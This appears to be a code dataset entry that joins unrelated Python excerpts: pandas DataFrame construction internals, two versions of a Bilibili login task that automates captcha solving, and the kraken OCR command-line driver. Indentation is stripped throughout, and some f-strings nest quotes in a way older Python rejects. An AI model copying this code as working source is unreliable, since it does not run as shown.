arrays = [arr.copy() for arr in arrays]
new_mgr = ArrayManager(arrays, [mgr.axes[1], mgr.axes[0]])
else:
array = mgr.internal_values()
if copy:
array = array.copy()
new_mgr = SingleArrayManager([array], [mgr.index])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
return new_mgr
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
# used in DataFrame.__init__
# input must be a ndarray, list, Series, Index, ExtensionArray
if isinstance(values, ABCSeries):
if columns is None:
if values.name is not None:
columns = Index([values.name])
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
# if the array preparation does a copy -> avoid this for ArrayManager,
# since the copy is done on conversion to 1D arrays
copy_on_sanitize = False if typ == "array" else copy
vdtype = getattr(values, "dtype", None)
if is_1d_only_ea_dtype(vdtype) or is_1d_only_ea_dtype(dtype):
# GH#19157
if isinstance(values, (np.ndarray, ExtensionArray)) and values.ndim > 1:
# GH#12513 a EA dtype passed with a 2D array, split into
# multiple EAs that view the values
# error: No overload variant of "__getitem__" of "ExtensionArray"
# matches argument type "Tuple[slice, int]"
values = [
values[:, n] # type: ignore[call-overload]
for n in range(values.shape[1])
]
else:
values = [values]
if columns is None:
columns = Index(range(len(values)))
else:
columns = ensure_index(columns)
return arrays_to_mgr(values, columns, index, dtype=dtype, typ=typ)
elif is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
# i.e. Datetime64TZ, PeriodDtype
values = extract_array(values, extract_numpy=True)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape(-1, 1)
else:
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy_on_sanitize)
if dtype is not None and not is_dtype_equal(values.dtype, dtype):
shape = values.shape
flat = values.ravel()
# GH#40110 see similar check inside sanitize_array
rcf = not (is_integer_dtype(dtype) and values.dtype.kind == "f")
values = sanitize_array(
flat, None, dtype=dtype, copy=copy_on_sanitize, raise_cast_failure=rcf
)
values = values.reshape(shape)
# _prep_ndarray ensures that values.ndim == 2 at this point
index, columns = _get_axes(
values.shape[0], values.shape[1], index=index, columns=columns
)
_check_values_indices_shape_match(values, index, columns)
if typ == "array":
if issubclass(values.dtype.type, str):
values = np.array(values, dtype=object)
if dtype is None and is_object_dtype(values.dtype):
arrays = [
ensure_wrapped_if_datetimelike(
maybe_infer_to_datetimelike(values[:, i])
)
for i in range(values.shape[1])
]
else:
if is_datetime_or_timedelta_dtype(values.dtype):
values = ensure_wrapped_if_datetimelike(values)
arrays = [values[:, i] for i in range(values.shape[1])]
if copy:
arrays = [arr.copy() for arr in arrays]
return ArrayManager(arrays, [index, columns], verify_integrity=False)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values.dtype):
obj_columns = list(values)
maybe_datetime = [maybe_infer_to_datetimelike(x) for x in obj_columns]
# don't convert (and copy) the objects if no type inference occurs
if any(x is not y for x, y in zip(obj_columns, maybe_datetime)):
dvals_list = [ensure_block_shape(dval, 2) for dval in maybe_datetime]
block_values = [
new_block_2d(dvals_list[n], placement=BlockPlacement(n))
for n in range(len(dvals_list))
]
else:
bp = BlockPlacement(slice(len(columns)))
nb = new_block_2d(values, placement=bp)
block_values = [nb]
else:
bp = BlockPlacement(slice(len(columns)))
nb = new_block_2d(values, placement=bp)
block_values = [nb]
if len(columns) == 0:
block_values = []
return create_block_manager_from_blocks(
block_values, [columns, index], verify_integrity=False
)
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
data: dict,
index,
columns,
*,
dtype: DtypeObj | None = None,
typ: str = "block",
copy: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
Used in DataFrame.__init__
"""
arrays: Sequence[Any] | Series
if columns is not None:
from pandas.core.series import Series
arrays = Series(data, index=columns, dtype=object)
missing = arrays.isna()
if index is None:
# GH10856
# raise ValueError if only scalars in dict
index = _extract_index(arrays[~missing])
else:
index = ensure_index(index)
# no obvious "empty" int column
if missing.any() and not is_integer_dtype(dtype):
nan_dtype: DtypeObj
if dtype is not None:
# calling sanitize_array ensures we don't mix-and-match
# NA dtypes
midxs = missing.values.nonzero()[0]
for i in midxs:
arr = sanitize_array(arrays.iat[i], index, dtype=dtype)
arrays.iat[i] = arr
else:
# GH#1783
nan_dtype = np.dtype("object")
val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
nmissing = missing.sum()
if copy:
rhs = [val] * nmissing
else:
# GH#45369
rhs = [val.copy() for _ in range(nmissing)]
arrays.loc[missing] = rhs
arrays = list(arrays)
columns = ensure_index(columns)
else:
keys = list(data.keys())
columns = Index(keys)
arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
arrays = [arr if not isinstance(arr, Index) else arr._data for arr in arrays]
if copy:
if typ == "block":
# We only need to copy arrays that will not get consolidated, i.e.
# only EA arrays
arrays = [x.copy() if isinstance(x, ExtensionArray) else x for x in arrays]
else:
# dtype check to exclude e.g. range objects, scalars
arrays = [x.copy() if hasattr(x, "dtype") else x for x in arrays]
return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
def nested_data_to_arrays(
data: Sequence,
columns: Index | None,
index: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index, Index]:
"""
Convert a single sequence of arrays to multiple arrays.
"""
# By the time we get here we have already checked treat_as_nested(data)
if is_named_tuple(data[0]) and columns is None:
columns = ensure_index(data[0]._fields)
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
if index is None:
if isinstance(data[0], ABCSeries):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
# GH#38845 hit in test_constructor_categorical
index = default_index(len(data[0]))
else:
index = default_index(len(data))
return arrays, columns, index
def treat_as_nested(data) -> bool:
"""
Check if we should use nested_data_to_arrays.
"""
return (
len(data) > 0
and is_list_like(data[0])
and getattr(data[0], "ndim", 1) == 1
and not (isinstance(data, ExtensionArray) and data.ndim == 2)
)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
if isinstance(values, TimedeltaArray) or (
isinstance(values, DatetimeArray) and values.tz is None
):
# On older numpy, np.asarray below apparently does not call __array__,
# so nanoseconds get dropped.
values = values._ndarray
if not isinstance(values, (np.ndarray, ABCSeries, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
elif isinstance(values, range):
arr = range_to_ndarray(values)
return arr[..., np.newaxis]
def convert(v):
if not is_list_like(v) or isinstance(v, ABCDataFrame):
return v
v = extract_array(v, extract_numpy=True)
res = maybe_convert_platform(v)
return res
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
if is_list_like(values[0]):
values = np.array([convert(v) for v in values])
elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
# GH#21861 see test_constructor_list_of_lists
values = np.array([convert(v) for v in values])
else:
values = convert(values)
else:
# drop subclass info
values = np.array(values, copy=copy)
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError(f"Must pass 2-d input. shape={values.shape}")
return values
def _homogenize(data, index: Index, dtype: DtypeObj | None) -> list[ArrayLike]:
oindex = None
homogenized = []
for val in data:
if isinstance(val, ABCSeries):
if dtype is not None:
val = val.astype(dtype, copy=False)
if val.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
val = val.reindex(index, copy=False)
val = val._values
else:
if isinstance(val, dict):
# GH#41785 this _should_ be equivalent to (but faster than)
# val = create_series_with_explicit_dtype(val, index=index)._values
if oindex is None:
oindex = index.astype("O")
if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
# see test_constructor_dict_datetime64_index
val = dict_compat(val)
else:
# see test_constructor_subclass_dict
val = dict(val)
val = lib.fast_multiget(val, oindex._values, default=np.nan)
val = sanitize_array(
val, index, dtype=dtype, copy=False, raise_cast_failure=False
)
com.require_length_match(val, index)
homogenized.append(val)
return homogenized
def _extract_index(data) -> Index:
"""
Try to infer an Index from the passed data, raise ValueError on failure.
"""
index = None
if len(data) == 0:
index = Index([])
else:
raw_lengths = []
indexes: list[list[Hashable] | Index] = []
have_raw_arrays = False
have_series = False
have_dicts = False
for val in data:
if isinstance(val, ABCSeries):
have_series = True
indexes.append(val.index)
elif isinstance(val, dict):
have_dicts = True
indexes.append(list(val.keys()))
elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(val))
elif isinstance(val, np.ndarray) and val.ndim > 1:
raise ValueError("Per-column arrays must each be 1-dimensional")
if not indexes and not raw_lengths:
raise ValueError("If using all scalar values, you must pass an index")
elif have_series:
index = union_indexes(indexes)
elif have_dicts:
index = union_indexes(indexes, sort=False)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError("All arrays must be of the same length")
if have_dicts:
raise ValueError(
"Mixing dicts with non-Series may lead to ambiguous ordering."
)
if have_series:
assert index is not None # for mypy
if lengths[0] != len(index):
msg = (
f"array length {lengths[0]} does not match index "
f"length {len(index)}"
)
raise ValueError(msg)
else:
index = default_index(lengths[0])
# error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
# expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
# Sequence[Any]]"
return ensure_index(index) # type: ignore[arg-type]
def reorder_arrays(
arrays: list[ArrayLike], arr_columns: Index, columns: Index | None, length: int
) -> tuple[list[ArrayLike], Index]:
"""
Pre-emptively (cheaply) reindex arrays with new columns.
"""
# reorder according to the columns
if columns is not None:
if not columns.equals(arr_columns):
# if they are equal, there is nothing to do
new_arrays: list[ArrayLike | None]
new_arrays = [None] * len(columns)
indexer = arr_columns.get_indexer(columns)
for i, k in enumerate(indexer):
if k == -1:
# by convention default is all-NaN object dtype
arr = np.empty(length, dtype=object)
arr.fill(np.nan)
else:
arr = arrays[k]
new_arrays[i] = arr
# Incompatible types in assignment (expression has type
# "List[Union[ExtensionArray, ndarray[Any, Any], None]]", variable
# has type "List[Union[ExtensionArray, ndarray[Any, Any]]]")
arrays = new_arrays # type: ignore[assignment]
arr_columns = columns
return arrays, arr_columns
def _get_names_from_index(data) -> Index:
has_some_name = any(getattr(s, "name", None) is not None for s in data)
if not has_some_name:
return default_index(len(data))
index: list[Hashable] = list(range(len(data)))
count = 0
for i, s in enumerate(data):
n = getattr(s, "name", None)
if n is not None:
index[i] = n
else:
index[i] = f"Unnamed {count}"
count += 1
return Index(index)
def _get_axes(
N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
# helper to create the axes as indexes
# return axes or defaults
if index is None:
index = default_index(N)
else:
index = ensure_index(index)
if columns is None:
columns = default_index(K)
else:
columns = ensure_index(columns)
return index, columns
def dataclasses_to_dicts(data):
"""
Converts a list of dataclass instances to a list of dictionaries.
Parameters
----------
data : List[Type[dataclass]]
Returns
--------
list_dict : List[dict]
Examples
--------
>>> from dataclasses import dataclass
>>> @dataclass
... class Point:
... x: int
... y: int
>>> dataclasses_to_dicts([Point(1, 2), Point(2, 3)])
[{'x': 1, 'y': 2}, {'x': 2, 'y': 3}]
"""
from dataclasses import asdict
return list(map(asdict, data))
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
"""
Return list of arrays, columns.
Returns
-------
list[ArrayLike]
These will become columns in a DataFrame.
Index
This will become frame.columns.
Notes
-----
Ensures that len(result_arrays) == len(result_index).
"""
if isinstance(data, ABCDataFrame):
# see test_from_records_with_index_data, test_from_records_bad_index_column
if columns is not None:
arrays = [
data._ixs(i, axis=1).values
for i, col in enumerate(data.columns)
if col in columns
]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
if data.dtype.names is not None:
# i.e. numpy structured array
columns = ensure_index(data.dtype.names)
arrays = [data[name] for name in columns]
if len(data) == 0:
# GH#42456 the indexing above results in list of 2D ndarrays
# TODO: is that an issue with numpy?
for i, arr in enumerate(arrays):
if arr.ndim == 2:
arrays[i] = arr[:, 0]
return arrays, columns
return [], ensure_index([])
elif isinstance(data[0], Categorical):
# GH#38845 deprecate special case
warnings.warn(
"The behavior of DataFrame([categorical, ...]) is deprecated and "
"in a future version will be changed to match the behavior of "
"DataFrame([any_listlike, ...]). "
"To retain the old behavior, pass as a dictionary "
"DataFrame({col: categorical, ..})",
FutureWarning,
stacklevel=find_stack_level(),
)
if columns is None:
columns = default_index(len(data))
elif len(columns) > len(data):
raise ValueError("len(columns) > len(data)")
elif len(columns) < len(data):
# doing this here is akin to a pre-emptive reindex
data = data[: len(columns)]
return data, columns
elif isinstance(data, np.ndarray) and data.dtype.names is not None:
# e.g. recarray
columns = Index(list(data.dtype.names))
arrays = [data[k] for k in columns]
return arrays, columns
if isinstance(data[0], (list, tuple)):
arr = _list_to_arrays(data)
elif isinstance(data[0], abc.Mapping):
arr, columns = _list_of_dict_to_arrays(data, columns)
elif isinstance(data[0], ABCSeries):
arr, columns = _list_of_series_to_arrays(data, columns)
else:
# last ditch effort
data = [tuple(x) for x in data]
arr = _list_to_arrays(data)
content, columns = _finalize_columns_and_data(arr, columns, dtype)
return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
# Note: we already check len(data) > 0 before getting hre
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
data: list,
columns: Index | None,
) -> tuple[np.ndarray, Index]:
# returned np.ndarray has ndim == 2
if columns is None:
# We know pass_data is non-empty because data[0] is a Series
pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
columns = get_objs_combined_axis(pass_data, sort=False)
indexer_cache: dict[int, np.ndarray] = {}
aligned_values = []
for s in data:
index = getattr(s, "index", None)
if index is None:
index = default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = extract_array(s, extract_numpy=True)
aligned_values.append(algorithms.take_nd(values, indexer))
# error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]";
# expected "Sequence[Union[Union[int, float, complex, str, bytes, generic],
# Sequence[Union[int, float, complex, str, bytes, generic]],
# Sequence[Sequence[Any]], _SupportsArray]]"
content = np.vstack(aligned_values) # type: ignore[arg-type]
return content, columns
def _list_of_dict_to_arrays(
data: list[dict],
columns: Index | None,
) -> tuple[np.ndarray, Index]:
"""
Convert list of dicts to numpy arrays
if `columns` is not passed, column names are inferred from the records
- for OrderedDict and dicts, the column names match
the key insertion-order from the first record to the last.
- For other kinds of dict-likes, the keys are lexically sorted.
Parameters
----------
data : iterable
collection of records (OrderedDict, dict)
columns: iterables or None
Returns
-------
content : np.ndarray[object, ndim=2]
columns : Index
"""
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, dict) for d in data)
pre_cols = lib.fast_unique_multiple_list_gen(gen, sort=sort)
columns = ensure_index(pre_cols)
# assure that they are of the base dict class and not of derived
# classes
data = [d if type(d) is dict else dict(d) for d in data]
content = lib.dicts_to_array(data, list(columns))
return content, columns
def _finalize_columns_and_data(
content: np.ndarray, # ndim == 2
columns: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
"""
Ensure we have valid columns, cast object dtypes if possible.
"""
contents = list(content.T)
try:
columns = _validate_or_indexify_columns(contents, columns)
except AssertionError as err:
# GH#26429 do not raise user-facing AssertionError
raise ValueError(err) from err
if len(contents) and contents[0].dtype == np.object_:
contents = _convert_object_array(contents, dtype=dtype)
return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
"""
Internal function to convert object array.
Parameters
----------
content: List[np.ndarray]
dtype: np.dtype or ExtensionDtype
Returns
-------
List[ArrayLike]
"""
# provide soft conversion of object dtypes
def convert(arr):
if dtype != np.dtype("O"):
arr = lib.maybe_convert_objects(arr)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays
|
import base64
from urllib import parse
import rsa
from reqs.login import LoginReq
from .base_class import Forced, Wait, Multi
class LoginTask(Forced, Wait, Multi):
TASK_NAME = 'null'
@staticmethod
async def check(_):
return (-2, None),
@staticmethod
async def work(user):
# 搞两层的原因是normal这里catch了取消这里时,直接return,会导致user自己调用主动登陆功能失败
await LoginTask.handle_login_status(user)
@staticmethod
async def handle_login_status(user):
if not user.is_online():
return await LoginTask.login(user)
if not (await LoginTask.is_token_usable(user)):
if not (await LoginTask.refresh_token(user)):
return await LoginTask.login(user)
else:
if not (await LoginTask.is_token_usable(user)):
return await LoginTask.login(user)
return True
@staticmethod
async def is_token_usable(user):
json_rsp = await LoginReq.is_token_usable(user)
if not json_rsp['code'] and 'mid' in json_rsp['data']:
user.info('token有效期检查: 仍有效')
return True
user.info('token可能过期')
return False
@staticmethod
async def refresh_token(user):
json_rsp = await LoginReq.refresh_token(user)
if not json_rsp['code'] and 'mid' in json_rsp['data']['token_info']:
user.info('token刷新成功')
data = json_rsp['data']
access_key = data['token_info']['access_token']
refresh_token = data['token_info']['refresh_token']
cookies = data['cookie_info']['cookies']
list_cookies = [f'{i['name']}={i['value']}' for i in cookies]
cookie = ';'.join(list_cookies)
login_data = {
'csrf': cookies[0]['value'],
'access_key': access_key,
'refresh_token': refresh_token,
'cookie': cookie
}
user.update_login_data(login_data)
return True
return False
@staticmethod
async def login(user):
name = user.name
password = user.password
json_rsp = await LoginReq.fetch_key(user)
data = json_rsp['data']
pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(data['key'])
crypto_password = base64.b64encode(
rsa.encrypt((data['hash'] + password).encode('utf-8'), pubkey)
)
url_password = parse.quote_plus(crypto_password)
url_name = parse.quote_plus(name)
json_rsp = await LoginReq.login(user, url_name, url_password)
while json_rsp['code'] == -105:
binary_rsp = await LoginReq.fetch_capcha(user)
captcha = await LoginReq.cnn_captcha(user, binary_rsp)
json_rsp = await LoginReq.login(user, url_name, url_password, captcha)
if not json_rsp['code'] and not json_rsp['data']['status']:
data = json_rsp['data']
access_key = data['token_info']['access_token']
refresh_token = data['token_info']['refresh_token']
dict_cookies = {i["name"]: i["value"] for i in data['cookie_info']['cookies']}
cookie = ';'.join(f'{key}={value}' for key, value in dict_cookies.items())
login_data = {
'csrf': dict_cookies['bili_jct'],
'access_key': access_key,
'refresh_token': refresh_token,
'cookie': cookie,
'uid': data['token_info']['mid']
}
user.update_login_data(login_data)
user.info('登陆成功')
return True
else:
login_data = {
'csrf': f'{json_rsp}',
'access_key': '',
'refresh_token': '',
'cookie': '',
'uid': 'NULL'
}
# print(dic_saved_session)
user.update_login_data(login_data)
user.info(f'登录失败,错误信息为:{json_rsp}')
return False
| import base64
from urllib import parse
import rsa
from reqs.login import LoginReq
from .base_class import Forced, Wait, Multi
class LoginTask(Forced, Wait, Multi):
TASK_NAME = 'null'
@staticmethod
async def check(_):
return (-2, None),
@staticmethod
async def work(user):
# 搞两层的原因是normal这里catch了取消这里时,直接return,会导致user自己调用主动登陆功能失败
await LoginTask.handle_login_status(user)
@staticmethod
async def handle_login_status(user):
if not user.is_online():
return await LoginTask.login(user)
if not (await LoginTask.is_token_usable(user)):
if not (await LoginTask.refresh_token(user)):
return await LoginTask.login(user)
else:
if not (await LoginTask.is_token_usable(user)):
return await LoginTask.login(user)
return True
@staticmethod
async def is_token_usable(user):
json_rsp = await LoginReq.is_token_usable(user)
if not json_rsp['code'] and 'mid' in json_rsp['data']:
user.info('token有效期检查: 仍有效')
return True
user.info('token可能过期')
return False
@staticmethod
async def refresh_token(user):
json_rsp = await LoginReq.refresh_token(user)
if not json_rsp['code'] and 'mid' in json_rsp['data']['token_info']:
user.info('token刷新成功')
data = json_rsp['data']
access_key = data['token_info']['access_token']
refresh_token = data['token_info']['refresh_token']
cookies = data['cookie_info']['cookies']
list_cookies = [f'{i["name"]}={i["value"]}' for i in cookies]
cookie = ';'.join(list_cookies)
login_data = {
'csrf': cookies[0]['value'],
'access_key': access_key,
'refresh_token': refresh_token,
'cookie': cookie
}
user.update_login_data(login_data)
return True
return False
@staticmethod
async def login(user):
name = user.name
password = user.password
json_rsp = await LoginReq.fetch_key(user)
data = json_rsp['data']
pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(data['key'])
crypto_password = base64.b64encode(
rsa.encrypt((data['hash'] + password).encode('utf-8'), pubkey)
)
url_password = parse.quote_plus(crypto_password)
url_name = parse.quote_plus(name)
json_rsp = await LoginReq.login(user, url_name, url_password)
while json_rsp['code'] == -105:
binary_rsp = await LoginReq.fetch_capcha(user)
captcha = await LoginReq.cnn_captcha(user, binary_rsp)
json_rsp = await LoginReq.login(user, url_name, url_password, captcha)
if not json_rsp['code'] and not json_rsp['data']['status']:
data = json_rsp['data']
access_key = data['token_info']['access_token']
refresh_token = data['token_info']['refresh_token']
dict_cookies = {i["name"]: i["value"] for i in data['cookie_info']['cookies']}
cookie = ';'.join(f'{key}={value}' for key, value in dict_cookies.items())
login_data = {
'csrf': dict_cookies['bili_jct'],
'access_key': access_key,
'refresh_token': refresh_token,
'cookie': cookie,
'uid': data['token_info']['mid']
}
user.update_login_data(login_data)
user.info('登陆成功')
return True
else:
login_data = {
'csrf': f'{json_rsp}',
'access_key': '',
'refresh_token': '',
'cookie': '',
'uid': 'NULL'
}
# print(dic_saved_session)
user.update_login_data(login_data)
user.info(f'登录失败,错误信息为:{json_rsp}')
return False
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
import pkg_resources
from typing import Dict, Union, List, cast, Any, IO, Callable
from functools import partial
from PIL import Image
import click
from kraken.lib import log
warnings.simplefilter('ignore', UserWarning)
logging.captureWarnings(True)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
SEGMENTATION_DEFAULT_MODEL = pkg_resources.resource_filename(__name__, 'blla.mlmodel')
DEFAULT_MODEL = ['en-default.mlmodel']
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
# raise default max image size to 20k * 20k pixels
Image.MAX_IMAGE_PIXELS = 20000 ** 2
def message(msg: str, **styles) -> None:
if logger.getEffectiveLevel() >= 30:
click.secho(msg, **styles)
def get_input_parser(type_str: str) -> Callable[[str], Dict[str, Any]]:
if type_str == 'alto':
from kraken.lib.xml import parse_alto
return parse_alto
elif type_str == 'page':
from kraken.lib.xml import parse_page
return parse_page
elif type_str == 'xml':
from kraken.lib.xml import parse_xml
return parse_xml
elif type_str == 'image':
return Image.open
# chainable functions of functional components (binarization/segmentation/recognition)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, input, output) -> None:
from kraken import binarization
ctx = click.get_current_context()
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
ctx.meta['first_process'] = False
else:
raise click.UsageError('Binarization has to be the initial process.')
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
message('Binarizing\t', nl=False)
try:
res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
low, high)
if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
res.save(f'{output}.png')
from kraken import serialization
fp.write(serialization.serialize([],
image_name=f'{output}.png',
image_size=res.size,
template=ctx.meta['output_mode']))
else:
form = None
ext = os.path.splitext(output)[1]
if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
form = 'png'
if ext:
logger.warning('jpeg does not support 1bpp images. Forcing to png.')
res.save(output, format=form)
ctx.meta['base_image'] = output
except Exception:
message('\u2717', fg='red')
raise
message('\u2713', fg='green')
def segmenter(legacy, model, text_direction, scale, maxcolseps, black_colseps,
remove_hlines, pad, mask, device, input, output) -> None:
import json
from kraken import pageseg
from kraken import blla
ctx = click.get_current_context()
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
input = get_input_parser(ctx.meta['input_format_type'])(input)['image']
ctx.meta['first_process'] = False
if 'base_image' not in ctx.meta:
ctx.meta['base_image'] = input
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
if mask:
try:
mask = Image.open(mask)
except IOError as e:
raise click.BadParameter(str(e))
message('Segmenting\t', nl=False)
try:
if legacy:
res = pageseg.segment(im,
text_direction,
scale,
maxcolseps,
black_colseps,
no_hlines=remove_hlines,
pad=pad,
mask=mask)
else:
res = blla.segment(im, text_direction, mask=mask, model=model, device=device)
except Exception:
message('\u2717', fg='red')
raise
if ctx.meta['last_process'] and ctx.meta['output_mode'] != 'native':
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
logger.info('Serializing as {} into {}'.format(ctx.meta['output_mode'], output))
from kraken import serialization
from kraken.rpred import ocr_record
if 'type' in res and res['type'] == 'baselines':
records = [ocr_record('', '', '', bl) for bl in res['lines']]
else:
records = []
for line in res['boxes']:
xmin, xmax = min(line[::2]), max(line[::2])
ymin, ymax = min(line[1::2]), max(line[1::2])
records.append(ocr_record('', [], [], [[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]]))
fp.write(serialization.serialize(records,
image_name=ctx.meta['base_image'],
image_size=im.size,
regions=res['regions'] if 'regions' in res else None,
template=ctx.meta['output_mode']))
else:
with click.open_file(output, 'w') as fp:
fp = cast(IO[Any], fp)
json.dump(res, fp)
message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, input, output) -> None:
import json
from kraken import rpred
ctx = click.get_current_context()
bounds = None
if 'base_image' not in ctx.meta:
ctx.meta['base_image'] = input
if ctx.meta['first_process']:
if ctx.meta['input_format_type'] != 'image':
doc = get_input_parser(ctx.meta['input_format_type'])(input)
ctx.meta['base_image'] = doc['image']
doc['text_direction'] = 'horizontal-lr'
if doc['base_dir'] and bidi_reordering is True:
message(f'Setting base text direction for BiDi reordering to {doc['base_dir']} (from XML input file)')
bidi_reordering = doc['base_dir']
bounds = doc
try:
im = Image.open(ctx.meta['base_image'])
except IOError as e:
raise click.BadParameter(str(e))
if not bounds and ctx.meta['base_image'] != input:
with click.open_file(input, 'r') as fp:
try:
fp = cast(IO[Any], fp)
bounds = json.load(fp)
except ValueError as e:
raise click.UsageError(f'{input} invalid segmentation: {str(e)}')
elif not bounds:
if no_segmentation:
bounds = {'script_detection': False,
'text_direction': 'horizontal-lr',
'boxes': [(0, 0) + im.size]}
else:
raise click.UsageError('No line segmentation given. Add one with the input or run `segment` first.')
elif no_segmentation:
logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
scripts = set()
# script detection
if 'script_detection' in bounds and bounds['script_detection']:
it = rpred.mm_rpred(model, im, bounds, pad,
bidi_reordering=bidi_reordering,
script_ignore=script_ignore)
else:
it = rpred.rpred(model['default'], im, bounds, pad,
bidi_reordering=bidi_reordering)
preds = []
with log.progressbar(it, label='Processing') as bar:
for pred in bar:
preds.append(pred)
ctx = click.get_current_context()
with click.open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
message(f'Writing recognition results for {ctx.meta['orig_file']}\t', nl=False)
